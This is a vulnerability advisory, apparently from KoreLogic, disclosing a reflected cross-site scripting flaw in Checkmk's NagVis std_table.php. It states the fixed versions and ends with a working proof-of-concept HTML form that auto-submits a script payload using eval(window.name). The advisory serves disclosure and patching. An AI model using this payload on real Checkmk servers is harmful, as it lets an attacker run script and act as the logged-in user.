Checkmk NagVis Reflected Cross-site Scripting

Vulnerability Description

The “NagVis” component within Checkmk is vulnerable to reflected cross-site scripting. An attacker can craft a malicious link that will execute arbitrary JavaScript in the context of the browser once clicked. The attack can be performed on both authenticated and unauthenticated users.

Technical Description

Checkmk version 2.3.0.p2 ships with a component named “NagVis”, which is an addon for the network management system “Nagios”. When receiving an HTTP POST request for the userfiles/gadgets/std_table.php file, the query and body parameters contained within the request are processed by the script. Specifically, the script accepts the members body parameter, which is then parsed as a JSON object.

The summary_state property of the members JSON object is reflected into the page response without validation. A POST request containing a malicious summary_state value can inject arbitrary JavaScript via the HTML script tag into the page response. When rendered in a browser, the attacker controlled JavaScript executes, enabling an attacker to perform actions as the currently logged-in user.

The members JSON object must be supplied via a POST body parameter, so exploitation of this issue relies on a cross-origin HTTP request originating from an attacker controlled web page. The malicious website (e.g. https://attacker.com/foo.html) can contain an HTML form tag with an action attribute pointing at the URL for the std_table.php script. Additional JavaScript on the attacker controlled page can automatically submit the form once a user loads the page. The browser will send a POST request cross-origin and redirect the browser to the HTTP response of the POST request, thereby executing the malicious JavaScript on the NagVis web page.

Mitigation and Remediation Recommendation

This issue has been remediated in Nagvis 1.9.42 and Checkmk 2.3.0p10, both release 2024-07-15.

Credit

This vulnerability was discovered by Jaggar Henry and Jim Becher of KoreLogic, Inc.

Proof of Concept

1. Serve the following HTML from a web server (e.g. python -m http.server)
2. View the URL serving the file in a web browser:

<html>
  <form
    method="POST"
    action="http://checkmkhost/cmk/nagvis/userfiles/gadgets/std_table.php?object_id=1337&scale=100&opts=show_service_states=foo;group_states=0;&type=dyngroup&object_types=host&state=FL"
  >
    <input
      type="hidden"
      name="members"
      value='[{"summary_in_downtime":1,"summary_state":"\"><script>eval(window.name)</script>"}]'
    />
  </form>

  <script>
    window.onload = function () {
      window.name = `prompt('KoreLogic')`;
      document.forms[0].submit();
    };
  </script>
</html>

The contents of this advisory are copyright(c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy